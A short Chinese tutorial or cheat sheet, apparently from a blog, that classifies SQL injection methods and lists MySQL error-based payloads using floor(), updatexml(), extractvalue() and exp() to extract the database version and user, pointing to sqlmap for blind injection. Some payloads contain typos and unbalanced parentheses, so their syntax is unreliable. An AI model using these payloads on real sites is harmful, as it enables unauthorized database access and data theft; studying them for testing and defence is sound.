主要内容:
. 确认SQL 注入方式
SQL注入按照注入方式分类可分为两类
显示注入
Union query #联合查询注入,通过union联合查询获取查询结
果
Error based #报错注入,通过报错信息获取查询结果
盲注
Boolean based blind #布尔盲注,通过应用返回不同的值判断田间真
假
Time based blind #时间盲注,通过不同的时间延迟推断条件真假
优先级:union query ≥ error based ≥ Boolean based blind ≥ time based blind
union注入:比较简单,就不赘述,如有需求可至主页查看博客
报错注入:
前提:应用可以输出数据库报错信息
floor()
And (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
Upadtexml()
And 1=(updatexml(1.concat(0x3a,(select user()),1))
Extractvalue()
And extractvalue(1,concat(0x5c,(select user())))
Exp()
And exp (~select * from(select user())a))
布尔盲注
时间延迟注入
这俩用sqlmap吧,手工会累死人的